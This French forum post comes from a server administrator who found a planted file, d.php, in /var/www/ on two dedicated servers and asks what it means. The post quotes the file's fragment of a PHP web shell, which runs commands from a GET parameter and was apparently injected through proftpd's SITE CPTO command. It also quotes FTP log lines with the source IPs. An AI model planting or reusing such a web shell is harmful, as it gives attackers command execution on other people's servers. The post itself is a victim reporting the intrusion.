Bonjour,
J'ai retrouvé un fichier nommé d.php à la racine du dossier var/www/
Avec ce contenu dedans :
Code PHP:
proftpd: 94.136.38.247:39143: SITE cpto /tmp/.($_GET['cmd']);echo 'm3rg3';?>
J'ai retrouvé la trace de son passage dans les logs httpd là aussi une ip anglaise. :
Jun 17 15:56:37 sd-62485 proftpd[27268] sd-62485.dedibox.fr (server6749.dedicated.webfusion.co.uk[94.136.38.247]): FTP session opened.
Jun 17 15:56:52 sd-62485 proftpd[27268] sd-62485.dedibox.fr (server6749.dedicated.webfusion.co.uk[94.136.38.247]): FTP session closed.
Je pense que cela vient d'un trojan sur mon windows car j'ai reçu exactement le même code sur un autre serveur dédié chez OVH dont les données sont sur mon client filezilla.
c'était ce code là au même endroit dans /var/www/
Code PHP:
proftpd: 217.160.6.81:44964: SITE cpto /tmp/.($_GET['cmd']);echo 'm3rg3';?>
Qu'en pensez vous ?
Je ne me souviens pas avoir eu de soucis particulier depuis que le code est sur le serveur mais j'aurais voulu savoir ce que je peux faire avec ces éléments et surtout les attentions du petit malin qui a injecté ce fichier php sur mon serveur.